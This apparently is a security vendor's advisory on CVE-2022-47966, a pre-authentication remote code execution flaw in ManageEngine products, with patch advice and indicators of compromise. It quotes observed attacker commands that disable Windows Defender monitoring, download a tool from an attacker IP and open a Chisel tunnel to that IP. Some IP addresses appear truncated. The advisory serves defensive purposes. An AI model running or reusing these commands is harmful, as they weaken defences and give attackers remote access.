overview

A vulnerability was found in two dozen ManageEngine products which is currently being exploited in the wild. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.

CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Between October and November 2022, patches were released but the timing of the fixed version releases varies by product.

During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.

As previously stated, an obsolete version of the Apache Santuario library, which implements security requirements for XML, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently or has previously been enabled on those products.

Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory, patch immediately.

 

 

avertium's recommendations

Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.

 

 

INDICATORS OF COMPROMISE (IoCs)

IP Addresses

  • 28.193[.]216
  • 93.193[.]64
  • 68.7[.]122

Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)

  • 001 Defense Evasion: Disable \ Modify tools (Disable Defender realtime)
    • Example:

powershell -windowstyle hidden set-mppreference –

disablerealtimemonitoring

set-mppreference -exclusionpath c:\users\public

 

  • T1105 Ingress Tool Transfer: Powershell cmdlet Invoke-WebRequest(IWR) used to download additional remote access tools
    • Example:

invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe

  • T1572 Protocol Tunneling: Chisel, Golang implementation of protocol tunneling tool - similar to Plink. Tunneling over socks proxy with Chisel.
    • Example:

c:\users\public\svhost.exe client 111.68.7[.]122:8080

R:0.0.0.0:43566:socks

 

 

 

How Avertium is Protecting Our CUSTOMERS

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.
  • Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident like a malware attack.
  • Avertium offers VMaaS to provide a deeper understanding and control over organizational information security risks. If your enterprise is facing challenges with the scope, resources, or skills required to implement a vulnerability management program with your team, outsourced solutions can help you bridge the gap.

 

 

SUPPORTING DOCUMENTATION

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability | Rapid7 Blog

ManageEngine Security Advisories

PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) - Help Net Security

 

 

 

 

Related Resource:  2023 Cybersecurity Landscape: 8 Lessons for Cybersecurity Professionals